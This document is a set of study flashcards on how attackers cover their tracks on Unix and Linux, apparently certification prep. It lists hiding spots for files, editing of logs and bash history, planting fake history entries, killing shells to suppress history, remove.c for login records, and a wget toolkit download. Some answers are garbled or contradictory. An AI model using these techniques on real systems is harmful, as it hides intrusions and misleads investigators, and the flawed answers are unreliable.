Book 5: Covering Tracks on Unix and Linux

Question 1

following an inital compromise, attackers will take steps to hide thier presence on systems to avoid detection?

Answer 1

true

Question 2

What steps will attackers take to avoid detection?

Answer 2

• remove artifacts following an exploit
• changing logs to remove evidence
• creating subtle hiding spaces to keep files as they collect data and pillage

Question 3

What are the 3 goals of attacker

Answer 3

1. compromise the target
2. achieve post exploitation goal
3. evade detection for as long as possible

Question 4

What is the easist way to hide files on UNIX

Answer 4

name it “.” or “..”

or “…” or “ “

Question 5

Easist way to hide a file in UNIX is to name the file with a dot?

Answer 5

yes.
wouldnt be neccessary if attacker had a rootkit or kernal mode rootkit technique/ root access but in this case he does not.

Question 6

Every directory has at least two other directories

Answer 6

.. refers to the parent directory

. refers to the current directory

Question 7

what are the 3 popular locations to hide files in UNIX?

Answer 7

/dev
/tmp
/etc

or
/usr/local/man
/usr/src

Question 8

/dev

Answer 8

directory contains information about devices on the system, such as chunks of your hard drive and references to terminals. A good place to hide files.

Question 9

/tmp

Answer 9

often contains strangely named files created by various apps to temporarily store data

Question 10

the /tmp file is emptied on reboot?

Answer 10

true.

Question 11

files stored in /tmp would need to be restored?

Answer 11

yes, it is a location emptied on reboot

Question 12

/etc

Answer 12

bad place to hide files. holds machine configuration and is carefully monitored by sys admins.

Question 13

What are the two increasingly popular locations to store/hide data?

Answer 13

/usr/local/man
and
/usr/src

Question 14

Main log files can be found by viewing the ___?

Answer 14

/etc/syslog.conf

Question 15

How can attackers find where logs are located on a UNIX system?

Answer 15

check /etc/syslog.conf by just checking this location or running a script that guessses where the logs are

Question 16

the __ process stores the logs for the machine?

Answer 16

syslog

Question 17

the configuration for the system logger is found in the ____ file.

Answer 17

/etc/syslog.conf file

Question 18

if using a log clearing script to guess the location of the logs it can malfunction due to __

Answer 18

running the script on an improper version of linux. or not stored in their default location

Question 19

Once find out where the logs are located from checking __ file, you know that they are mainly stored in which directory?

Answer 19

/etc/syslong.conf

/var/log

Question 20

several flavors of linux store their system logs in the ___ directory

Answer 20

/var/log

Question 21

web server (http) store their logs wihtin their own directories?

Answer 21

true

Question 22

almost all logs within /var/log are stored in ASCII?

Answer 22

yes. so they can be edited with vi or nano. an attacker will and can delete these entries

Question 23

What logs are of particular interest to attacker?

Answer 23

/var/log/secure

/var/log/messages

Question 24

logs written in /var/log are in ASCII?

Answer 24

yes

Question 25

What logs of particular service are exploited to gain access?

Answer 25

/var/log/httpd/error.log

/var/log/httpd/access.log

Question 26

Logs written in /var/log are usually edited by?

Answer 26

hand, because they are ASCII and can be edited via script.

Question 27

The __ where you type a command has the option of recording each command

Answer 27

shell

Question 28

by default the __ __ included in linux stores the most recent x commands typed in.

Answer 28

bash shell

Question 29

by default bash shell keeps track of the last __ commands, although __ on some linux distros

Answer 29

500

1,000

Question 30

The bash history is written in ASCII and can be edited by hand?

Answer 30

true.

Question 31

both bash history and /var/logs are written in ascii and can be edited by hand?

Answer 31

true

Question 32

what can an attacker do to the bash history to make it look like someone else did something?

Answer 32

since file is ascii can plant fake commands into another users bash history file to divrt attention during an investigation

Question 33

How can an attacker divert investigation?

Answer 33

plant false commands in another users history file

Question 34

What are the problems with shell history?

Answer 34

You wont see your most recent command because the shell history is written when the shell is exited. They are stored in RAM until the shell is exited.

Question 35

Shell history is written when the shell is ___?

Answer 35

exited

Question 36

You wont see your most recent commands in the shell history because?

Answer 36

shell is written when the shell is exited

Question 37

Most recent commands that would be in the shell history are stored in __ until the __ is exited

Answer 37

RAM

Shell

Question 38

if an attacker tried to invoke the shell and typed vi .bash_history this command would show up in the shell history file?

Answer 38

yes

Question 39

What is a unsuccesful way to try and conceal entries in the bash history?

Answer 39

edit the shell file
exit the shell
start another shell
edit the history file again to remove it

BUT “chicken and egg” problem, the command will be added again

Question 40

What are the two widely known solutions to removing entries from bash history

Answer 40

1. Killing the shell so that it cannot write the most recent shell history, including the commands used to edit it
2. changing the environment variable HISTFiLE

Question 41

how would I kill the bash shell?

Answer 41

kill -9 [pid]

Question 42

how do I kill all bash shells?

Answer 42

killall -9 bash

Question 43

the second process to removing entries from bash history is __ and the command is___ $ unset __ then __ __ __

Answer 43

changing the environment variable HISTFILE

$unset HISTFILE then KILL -9 $$

Question 44

What is the 3rd option to removing entries from bash history?

Answer 44

adding a space before the command in bash to not log specific commands.

Question 45

What are the accounting entries in UNIX?

Answer 45

utmp
wtmp
btmp
lastlog

Question 46

file contains info about currently logged in users?

Answer 46

utmp

Question 47

default location of utmp?

Answer 47

/var/run/utmp

Question 48

file contains data about past user logins?

Answer 48

wtmp

Question 49

file contains bad login entries for failed login attempts?

Answer 49

btmp

Question 50

default location of wtmp?

Answer 50

/var/log

Question 51

default location of btmp?

Answer 51

/var/log/btmp

Question 52

file shows login name, port, and last login time for each user?

Answer 52

lastlog

Question 53

default location of lastlog?

Answer 53

/var/log/lastlog

Question 54

What are the default locations of accounting entries in UNIX?

Answer 54

/var/run/utmp
/var/log/wtmp
/var/log/btmp
/var/log/lastlog

Question 55

what is the only accounting log not stored within var/log

Answer 55

utmp

/var/log/utmp

Question 56

What command will print a list of all users currently actively logged in on the system?

Answer 56

$who

Question 57

the btmp file is usually configirued to be turned off because sys admins dont want to leave the file sitting around with bad ID attempts because it could contain passwords?

Answer 57

true

Question 58

the accouting entry files are stored in ASCII?

Answer 58

FALSE

Question 59

How are the accounting entries stored in UNIX?

Answer 59

utmp structures

Question 60

Accounting entries are stored as __ structures

Answer 60

utmp

Question 61

both bash history and /var/logs are written in ascii and can be edited by hand BUT the acccounting entries (utmp,wtmp,btmp) are not and are stored as ___?

Answer 61

utmp structures

Question 62

to edit the accounting files you have to use specialized tools or else __?

Answer 62

the files will become corrupted

Question 63

the accounting entries will become corrupted if you try and edit them without proper tool?

Answer 63

yes

Question 64

What specialized tool can edit the accounting files?

Answer 64

remove.c

Question 65

___.c can edit the utmp,wtmp,btmp and lastlog because they are stored as a specialized format called ___ ___

Answer 65

remove.c

utmp structures

Question 66

$whoami

Answer 66

• checking to see which account they have gained control of on the machine- could be checking for root privilege’s

Question 67

$id

Answer 67

get more details about the ID number and groups associated with the current account

Question 68

$uname -a

Answer 68

detailed kernel version the system is running.

useful to further exploit system or getting an idea of types of linux machines target organization is using.

Question 69

$nc

Answer 69

checking to see if netcat is installed on the path for the account

Question 70

$wget 10.10.10.10/kitz.tgz

Answer 70

wget tool can download wevpages to pull a file from a machine.

Question 71

$mv nc init

Answer 71

moving a file called nc to a file called init therefore blending in